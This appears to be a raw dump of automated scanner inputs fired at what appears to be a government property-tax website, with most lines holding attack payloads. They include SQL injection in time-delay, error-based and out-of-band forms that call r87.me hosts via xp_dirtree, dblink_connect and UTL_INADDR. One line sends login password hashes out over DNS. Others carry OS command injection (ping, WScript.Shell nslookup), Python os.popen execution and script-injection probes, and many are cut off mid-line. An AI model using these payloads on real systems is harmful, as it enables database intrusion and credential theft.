2176 (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
2177 syscolumns WHERE 2>3;exec('xp_dirtree ''\\sbrj_544ntr_lhqnsrbpno9nw30rojdauxkgdxol'+'yhm.r87.me'+'\c
2178 ping -n 30 127.0.0.1 &
2179 Smith
2180 DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';
2181
2182 DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';
2183
2184 __import__('os').popen(('expr 268409241 - {0}').format('44419')).read()
2185 Smith
2186 ping -n 30 127.0.0.1 &
2187 Smith
2188 Smith
2189 Smith (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
2190
2191 __import__('os').popen(('SET /A 268409241 - {0}').format('57645')).read()
2192 -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
2193 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'
2194 Smith ping -n 25 127.0.0.1 &
2195
2196 __import__('os').popen(('SET /A 268409241 - {0}').format('47690')).read()
2197 Smith -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
2198 Smith
2199 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'
2200
2201 Smith
2202 Smith ping -n 1 127.0.0.1 &
2203 Smith
2204
2205 -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''
2206
2207 Smith
2208 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
2209 -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''
2210
2211
2212 SELECT dblink_connect('host=sbrj_544ntcz6oexqcrrpb0vx2rfqw10ibea14lq'||'alq.r87.me user=a password=a
2213 Smith ping -n 1 127.0.0.1 &
2214 Smith
2215
2216 SELECT dblink_connect('host=sbrj_544ntdziaruqixeocegqwsjdi8gsyf5jhio'||'dru.r87.me user=a password=a
2217
2218 dblink_connect('host=sbrj_544ntyw5x_3azrulk3me4a23bcyib2wyuoy'||'ssw.r87.me user=a password=a connec
2219 Smith 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
2220
2221
2222 dblink_connect('host=sbrj_544ntt__2h5u5ftwwn-x6l9dwkh5-egl8rz'||'4s4.r87.me user=a password=a connec
2223 "&ping -w 25 127.0.0.1 &"
2224 Smith
2225 Smith
2226 cast((SELECT dblink_connect('host=sbrj_544ntbiukhb-lcwzn--4khe-vartnfrygot'||'01g.r87.me user=a pass
2227 cast((SELECT dblink_connect('host=sbrj_544nt28cwsejyj3wplyklarggjoodaev53v'||'bcq.r87.me user=a pass
2228 Smith
2229 Smith "&ping -w 25 127.0.0.1 &"
2230 cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(115)||chr(98)||chr(
2231 Smith
2232 Smith
2233
2234 cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(115)||chr(98)||chr(
2235 Smith
2236 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
2237 Smith
2238 '&ping -w 25 127.0.0.1 &'
2239
2240 '||(SELECT dblink_connect('host=sbrj_544ntwan9o39ud_od72oavmkqsxzkrjweq7'||'cxg.r87.me user=a passwo
2241 Smith
2242 Smith (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
2243
2244 '||(SELECT dblink_connect('host=sbrj_544nt_ll5gihzgiiccfsd--6bvalxamjzas'||'ixg.r87.me user=a passwo
2245 Smith
2246 Smith '&ping -w 25 127.0.0.1 &'
2247 (select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntu-f1xhuavx8bliyab-wki0bi_qisob'||'2m0.r87.me') from D
2248 (select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544nt9qhxwmgqbe3ogrp_uqntiibxvtfvgw'||'q74.r87.me') from D
2249 Smith
2250 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntjopkfbk6_yyopp7kvdjt8u
2251 Smith
2252
2253 &ping -w 25 127.0.0.1 &
2254
2255 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntzdyqoeerst6utys2rkhcab
2256 Smith
2257 Smith
2258
2259
2260
2261 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntibx89pz3ra2ysjf9gkity7uwxjz
2262 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
2263 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntgxeaqu5b9nmsynx5lrwkcomfwlo
2264 Smith
2265 Smith
2266 ' WAITFOR DELAY '0:0:25'-- /* 7586db40-b0ec-4b35-8cd3-b2cfe5ee4173 */
2267 Smith
2268 Smith &ping -w 25 127.0.0.1 &
2269 (select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)
2270 ' WAITFOR DELAY '0:0:25'-- /* 1af4dbbc-2821-4079-b1b1-502ed5ae1fd2 */
2271
2272 (select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)
2273 Smith '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
2274
2275
2276 Smith
2277 Smith &ping -w 1 127.0.0.1 &
2278 Smith
2279 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
2280
2281 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(
2282 Smith &ping -w 1 127.0.0.1 &
2283 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(
2284 Smith '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
2285
2286 Smith
2287 1 WAITFOR DELAY '0:0:25'-- /* a72e10d3-ccc0-485b-bf31-beafb4010951 */
2288 Smith
2289 ping -w 25 127.0.0.1 &
2290 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)|
2291 1 WAITFOR DELAY '0:0:1'-- /* 4f9f5347-836b-4824-9b4e-db3148bb6d43 */
2292 -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
2293
2294 Smith
2295
2296 Smith
2297 Smith ping -w 25 127.0.0.1 &
2298
2299 Smith -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
2300
2301 Smith
2302 1 WAITFOR DELAY '0:0:1'-- /* 430814b3-e101-419f-a1a3-5c607c85a250 */
2303 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)|
2304 ping -n 25 127.0.0.1
2305 Smith
2306 1 WAITFOR DELAY '0:0:30'-- /* 580d7c66-4f23-446c-8b4f-1a4daaefc1bd */
2307 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
2308 1 WAITFOR DELAY '0:0:30'-- /* d4665672-76a0-403d-beae-e371bd9f8072 */
2309
2310
2311 Smith
2312
2313 Smith
2314 1 WAITFOR DELAY '0:0:25'-- /* 608d3c7b-20ca-4507-80e1-829d6ad85602 */
2315 Smith
2316 Smith
2317
2318 Smith -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
2319
2320 ping -n 1 127.0.0.1
2321
2322 ping -n 1 127.0.0.1
2323 Smith
2324 Smith
2325 ping -n 30 127.0.0.1
2326
2327 Smith
2328
2329 ping -n 30 127.0.0.1
2330
2331
2332 Smith
2333 Smith
2334 Smith ping -n 25 127.0.0.1
2335 1 WAITFOR DELAY '0:0:1'-- /* 600c6fb0-80bf-466a-8002-9036304d6a00 */
2336 Smith
2337 Smith
2338 ping -w 25 127.0.0.1
2339 1 WAITFOR DELAY '0:0:1'-- /* 38537c47-4550-4ea8-a59d-65c7e5adba2d */
2340
2341
2342
2343 Smith ping -w 25 127.0.0.1
2344 Smith
2345 Smith
2346
2347 WAITFOR DELAY '0:0:25'-- /* 21535a91-f5ed-49b5-8a21-5c21d9a8d734 */
2348 <%a style=x:expre/**/ssion(netsparker(0x00745B))>
2349 Smith
2350 Smith
2351 Smith ping -w 1 127.0.0.1
2352 Smith ping -w 1 127.0.0.1
2353
2354
2355 WAITFOR DELAY '0:0:1'-- /* c4984fbe-6ecb-4ffc-a97e-c526478f8b07 */
2356
2357 Smith ping -w 30 127.0.0.1
2358 WAITFOR DELAY '0:0:1'-- /* 694ae9d7-f9f4-4808-9c9b-170569e1b7d6 */
2359
2360 Smith ping -w 30 127.0.0.1
2361 Smith
2362
2363
2364 Smith
2365 Smith
2366 Smith
2367 Smith
2368
2369
2370 WAITFOR DELAY '0:0:25'-- /* 8e6386dc-a1cd-42a2-a225-07f6202aed62 */
2371 |ping -n 25 127.0.0.1
2372
2373
2374 Smith
2375 Smith |ping -n 25 127.0.0.1
2376 1) WAITFOR DELAY '0:0:25'-- /* 10cf5b62-2636-466a-9add-9f75e7c5d3fc */
2377 Smith
2378 Smith
2379 Smith
2380
2381
2382
2383 Smith
2384 1) WAITFOR DELAY '0:0:25'-- /* efd4e309-c3ca-4dbe-bc12-ddd940937c37 */
2385
2386
2387 Smith
2388 Smith
2389 Smith
2390 Smith
2391 Smith
2392 ') WAITFOR DELAY '0:0:25'-- /* 69cee6ec-760f-4492-8eee-fa8836858d1d */
2393
2394
2395
2396 ') WAITFOR DELAY '0:0:1'-- /* dd6aa46c-44e6-4028-aa20-4e51cc8d8527 */
2397 Smith
2398
2399
2400
2401 Smith
2402 ') WAITFOR DELAY '0:0:1'-- /* 7bb55b97-bd44-4371-8d5f-b54767d522eb */
2403 Smith
2404 Smith
2405 Smith
2406
2407 ') WAITFOR DELAY '0:0:30'-- /* 72af7ea9-b365-4278-a315-e9a45bccafc7 */
2408 Smith
2409
2410 Smith
2411
2412 ') WAITFOR DELAY '0:0:30'-- /* 138a088d-ac18-4525-a5a5-d5b2db627b4e */
2413
2414
2415
2416 ') WAITFOR DELAY '0:0:25'-- /* 0b002903-f730-48a8-83aa-6ad47a332b99 */
2417 Smith
2418 Smith
2419 Smith
2420 Smith
2421
2422 Smith
2423
2424 ') WAITFOR DELAY '0:0:1'-- /* 3f624714-bfa4-423b-a65c-15a16aa7d995 */
2425
2426
2427 ') WAITFOR DELAY '0:0:1'-- /* d5cdf6ec-f830-45b0-91c5-f4382ca04c99 */
2428 Smith
2429 Smith
2430
2431
2432 ') WAITFOR DELAY '0:0:30'-- /* 3026b78a-2a69-4068-8519-13535dafe08c */
2433 Smith
2434 Smith
2435 ') WAITFOR DELAY '0:0:30'-- /* d60fd145-79b3-4e05-ad12-6cad2da062cf */
2436
2437 Smith
2438
2439 Smith
2440
2441 ')) WAITFOR DELAY '0:0:25'-- /* 637c6601-d159-4036-aea5-629eec21f938 */
2442 Smith
2443
2444 Smith
2445
2446 Smith
2447
2448
2449 Smith
2450
2451 ')) WAITFOR DELAY '0:0:25'-- /* 4ff2c811-f3fe-4fb7-bb13-67f9dc4648eb */
2452 ";l=document.createElement("link");l.rel="prefetch";l.href="//sbrj_544ntpgtmwkzvvydn_nox9aetjolqqx51
2453 Smith
2454
2455 Smith
2456 Smith
2457 Smith
2458
2459 ')) WAITFOR DELAY '0:0:1'-- /* ed76ee9f-df80-4874-b25b-ded494bc06d5 */
2460 Smith
2461 ')) WAITFOR DELAY '0:0:1'-- /* 3dddb4be-c5ba-4df4-b78e-4d896935cdd4 */
2462 Smith
2463
2464 ')) WAITFOR DELAY '0:0:30'-- /* 2875810f-bd3d-476e-85dc-e5447dfcae4e */
2465
2466 ";l=document.createElement("link");l.rel="prefetch";l.href="//sbrj_544nt8zeeadtetmuanwoexluqqm6hgbzv
2467
2468 ')) WAITFOR DELAY '0:0:30'-- /* 15258622-7da1-456e-a801-c127603b402d */
2469 Smith
2470 Smith
2471
2472
2473
2474 Smith
2475 Smith
2476 Smith
2477
2478
2479 1)) WAITFOR DELAY '0:0:25'-- /* dd229c7c-e2a6-4f61-b11f-56fcd8e6f9da */
2480 Smith
2481 ';l=document.createElement("link");l.rel="prefetch";l.href="//sbrj_544ntxvms-r-blxfrucjxqca8msyqwesy
2482
2483
2484
2485 Smith
2486 Smith
2487 Smith
2488 1)) WAITFOR DELAY '0:0:1'-- /* 192e44e6-6884-47e9-9107-0cd3a255a81e */
2489 Smith
2490
2491
2492 ';l=document.createElement("link");l.rel="prefetch";l.href="//sbrj_544ntdkdr4_erlyvqrkuh7sohhlbvboou
2493 1)) WAITFOR DELAY '0:0:1'-- /* 1e4bb3f8-60c7-4570-87ce-8a75679dba6e */
2494 Smith
2495 Smith
2496 1)) WAITFOR DELAY '0:0:30'-- /* ab0ea390-65ba-459f-ae12-f4d98c72d0d4 */
2497
2498 Smith
2499 1)) WAITFOR DELAY '0:0:30'-- /* 9da03097-3bac-45f4-98d1-ab98b7119853 */
2500
2501
2502 Smith
2503
2504 1)) WAITFOR DELAY '0:0:25'-- /* c8390f10-e864-4a01-9d80-7c2cea7be11a */
2505
2506 Smith
2507 Smith
2508
2509 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR
2510 Smith
2511
2512 Smith
2513 Smith
2514
2515 Smith
2516
2517 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR
2518 Smith
2519 https://propertytax.jk.gov.in/trace.axd
2520
2521
2522 https://propertytax.jk.gov.in/trace.axd
2523 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
2524
2525 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
2526 exec('xp_dirtree ''\\sbrj_544nt53xswmmvrad_xzgailf8rztiupjdaj'+'ix4.r87.me'+'\c$\a''')
2527 Smith
2528 Smith
2529 Smith
2530 propertytax.jk.gov.in/trace.axd
2531
2532 Smith exec('xp_dirtree ''\\sbrj_544ntv-7ggbnhrmkck8byzjskdkzealklk3'+'rgy.r87.me'+'\c$\a''')
2533
2534 Smith
2535 propertytax.jk.gov.in/trace.axd
2536 Smith
2537 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR
2538
2539 Smith
2540 declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.sbrj_544ntxnbbivm9gv1hyntilymdu8y7cfgra_'+'30k.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
2541
2542 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR
2543 Smith
2544
2545 Smith
2546 /trace.axd
2547 Smith declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.sbrj_544ntlidzpxvdpoiulwgbugdsfx-stms4dy'+'-fu.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
2548
2549
2550 Smith
2551 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/*
2552 1;exec('xp_dirtree ''\\sbrj_544ntp-uwq_de1v02weqitqjpf0ccr87i_v'+'6re.r87.me'+'\c$\a''')--
2553 Smith
2554
2555 /trace.axd
2556
2557 Smith 1;exec('xp_dirtree ''\\sbrj_544ntzj0dz9zqxejjzrcyliw8xilwwylehm'+'nyu.r87.me'+'\c$\a''')--
2558 -1';exec('xp_dirtree ''\\sbrj_544ntd6bqiiyxergcfgfiiwcn9158cpq0pj'+'opg.r87.me'+'\c$\a''')--
2559 Smith
2560 127.100.11.2/trace.axd
2561 Smith
2562
2563 Smith -1';exec('xp_dirtree ''\\sbrj_544ntpo1gcspmst1zpyfrkz8cfr15ns1g_h'+'ddq.r87.me'+'\c$\a''')--
2564 1) exec('xp_dirtree ''\\sbrj_544ntodulhx9vsvvogxxgaobnvvbpfkwpbt'+'saq.r87.me'+'\c$\a''')--
2565
2566 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/*
2567 Smith
2568 Smith
2569 127.100.11.2/trace.axd
2570 gethostbyname(trim('sbrj_544ntviwoyt0vyvjbtiqru8dh1d8zz2psfr'.'h28.r87.me'))
2571 Smith 1) exec('xp_dirtree ''\\sbrj_544ntenmeruxyyqcjafckwbushih2yqaoy5'+'3o8.r87.me'+'\c$\a''')--
2572
2573 Smith
2574 gethostbyname(trim('sbrj_544ntaakgngmev60wk3bh14sgdos-ahqlkn'.'yui.r87.me'))
2575 127.0.0.1/trace.axd
2576 1')exec('xp_dirtree ''\\sbrj_544ntm8zdp1fj3d_qou-ntcr4z9sljeqkyt'+'kes.r87.me'+'\c$\a''')--
2577
2578 response.write(268409241-22419)'
2579 gethostbyname(trim('sbrj_544nt_k_r3yxzucn_xi3ukqx52d_xjhz_aa'.'jji.r87.me'));
2580 Smith 1')exec('xp_dirtree ''\\sbrj_544nt6eudzb8hqq5rbohglihpgjqtgosxbc'+'xia.r87.me'+'\c$\a''')--
2581 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/*
2582 Smith
2583 1))exec('xp_dirtree ''\\sbrj_544ntj-nd7hubph5vwdd0h5e5goxbk84drn'+'zqk.r87.me'+'\c$\a''')--
2584 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/*
2585 gethostbyname(trim('sbrj_544ntyjmgwsgb9_jc1ocjjhemcvyyfnzokh'.'fbw.r87.me'));
2586 Smith
2587 127.0.0.1/trace.axd
2588 Smith 1))exec('xp_dirtree ''\\sbrj_544nttvesshnnqoa3rgwgkkrtiyyvzpac4f'+'ihg.r87.me'+'\c$\a''')--
2589 +gethostbyname(trim('sbrj_544nt3sxifzp5s1tombq6x32rnemydsvl8q'.'nsq.r87.me'));//
2590
2591 Smith response.write(268409241-51436)'
2592 DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','sbrj_544nt9wd7zqgfitbbr_hyl5pforoclzzwac'+'e-w.r87.me')exec sp_executesql @r
2593 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/*
2594 +gethostbyname(trim('sbrj_544ntiklxfggwwmy9fl2y1xtj0tlzfirqur'.'zrw.r87.me'));//
2595 [::1]/trace.axd
2596 Smith DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','sbrj_544ntaalbpx_xh3k0d5ujf-ofq-ksy2ar9l'+'owg.r87.me')exec sp_executesql @r
2597 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/*
2598 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','sbrj_544ntocwu-phpsikqzpbtyolooq5zf1a14h'+'xou.r87.me')exec sp_executesql @r--
2599
2600 Smith
2601 [::1]/trace.axd
2602 '+gethostbyname(trim('sbrj_544ntag5fu2dvwtb9mbvpwfnc2gczlnmxwa'.'mmk.r87.me'))+'
2603 Smith 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','sbrj_544ntsg93dspylh15sbrqwcol1lwcpyna4e'+'iwq.r87.me')exec sp_executesql @r--
2604 +response.write(268409241-24982)'
2605 '+gethostbyname(trim('sbrj_544ntnrgwobrultvyfybcntzegzvffnndvb'.'woi.r87.me'))+'
2606 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/
2607 https://propertytax.jk.gov.in/elmah.axd
2608 "+gethostbyname(trim('sbrj_544ntubqrmxvegygz4fkikxpz2y2d4vxqse'.'_cy.r87.me'))+"
2609 -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','sbrj_544ntwugd7pdufzr6ayxa7jmgetvwd-tliw'+'0aw.r87.me')exec sp_executesql @r--
2610
2611 Smith
2612 Smith +response.write(268409241-62717)'
2613 Smith -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','sbrj_544ntzgfujnrkjekwtcoio8-r2sszmqdlro'+'v9e.r87.me')exec sp_executesql @r--
2614 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/
2615 "+gethostbyname(trim('sbrj_544nts234kj9is4t4hrirhokhxakocbvt93'.'1ww.r87.me'))+"
2616 Smith
2617 SELECT dblink_connect('host=sbrj_544ntcedlrhg9wjdbmsdgx1wntamgflgkb0'||'n_8.r87.me user=a password=a connect_timeout=2')
2618 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/
2619 Smith SELECT dblink_connect('host=sbrj_544ntffvlz-ew2_omnro4swe5owffqn_txj'||'hum.r87.me user=a password=a connect_timeout=2')
2620 https://propertytax.jk.gov.in/elmah.axd
2621
2622 "+response.write(268409241-59359)+"
2623 dblink_connect('host=sbrj_544ntdvj4rjmsgsiort-u89otlrtt9te-us'||'5vm.r87.me user=a password=a connect_timeout=2')
2624
2625 Smith dblink_connect('host=sbrj_544ntcsu3s3bv5pvxjsifbvxsaf-rbz4t2r'||'bsy.r87.me user=a password=a connect_timeout=2')
2626 propertytax.jk.gov.in/elmah.axd
2627 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/
2628 '{${gethostbyname(trim('sbrj_544nt55ynwvxndcnrlu1iewelyvlnbbkjub'.'1li.r87.me'))}}'
2629 cast((SELECT dblink_connect('host=sbrj_544ntmrq5mjcuxoedr2ek3ngqnnm1s-sz18'||'8s4.r87.me user=a password=a connect_timeout=2')) as numeric)
2630 '{${gethostbyname(trim('sbrj_544ntfa_sftgdled5rl_koselmh5gbt8dkk'.'abs.r87.me'))}}'
2631 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/
2632 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/
2633 Smith cast((SELECT dblink_connect('host=sbrj_544nttxayvdwvlbtab6e9mcaupvsbekrszs'||'dne.r87.me user=a password=a connect_timeout=2')) as numeric)
2634 Smith
2635 propertytax.jk.gov.in/elmah.axd
2636 Smith "+response.write(268409241-17804)+"
2637 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)
2638 Smith
2639 createobject("WScript.Shell").exec("nslookup sbrj_544ntehvqvrxstd3daex3v7njqtpa0guqwr" & "txk.r87.me
2640 createobject("WScript.Shell").exec("nslookup sbrj_544nthkzaxvz9_zmpdmi2916c2_1wt8j1xu" & "hrm.r87.me
2641 /elmah.axd
2642 cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)||chr(52)||chr(110)||chr(116)||chr(112)||chr(109)||chr(111)||chr(95)||chr(100)||chr(107)||chr(110)||chr(106)||chr(103)||chr(111)||chr(116)||chr(54)||chr(57)||chr(50)||chr(122)||chr(99)||chr(48)||chr(114)||chr(48)||chr(122)||chr(98)||chr(115)||chr(106)||chr(118)||chr(111)||chr(111)||chr(103)||chr(109)||chr(98)||chr(118)||chr(118)||chr(52)||chr(121)||chr(46)|
2643 <% response.write(268409241-46350) %>
2644 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)
2645
2646 Smith cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)||chr(52)||chr(110)||chr(116)||chr(117)||chr(98)||chr(113)||chr(121)||chr(53)||chr(122)||chr(98)||chr(112)||chr(120)||chr(95)||chr(45)||chr(102)||chr(102)||chr(101)||chr(116)||chr(119)||chr(119)||chr(55)||chr(115)||chr(101)||chr(119)||chr(99)||chr(113)||chr(116)||chr(98)||chr(114)||chr(98)||chr(50)||chr(103)||chr(106)||chr(105)||chr(110)||chr(115)||chr(46)|
2647 +createobject("WScript.Shell").exec("nslookup sbrj_544ntklsuzuln_fpmjgnna2pj01b-fo8bdw" & "pdu.r87.m
2648 /elmah.axd
2649 Smith <% response.write(268409241-72769) %>
2650 '||(SELECT dblink_connect('host=sbrj_544ntzmegj6evtduiglct2i8xemxu_qzpf6'||'sey.r87.me user=a password=a connect_timeout=2'))||'
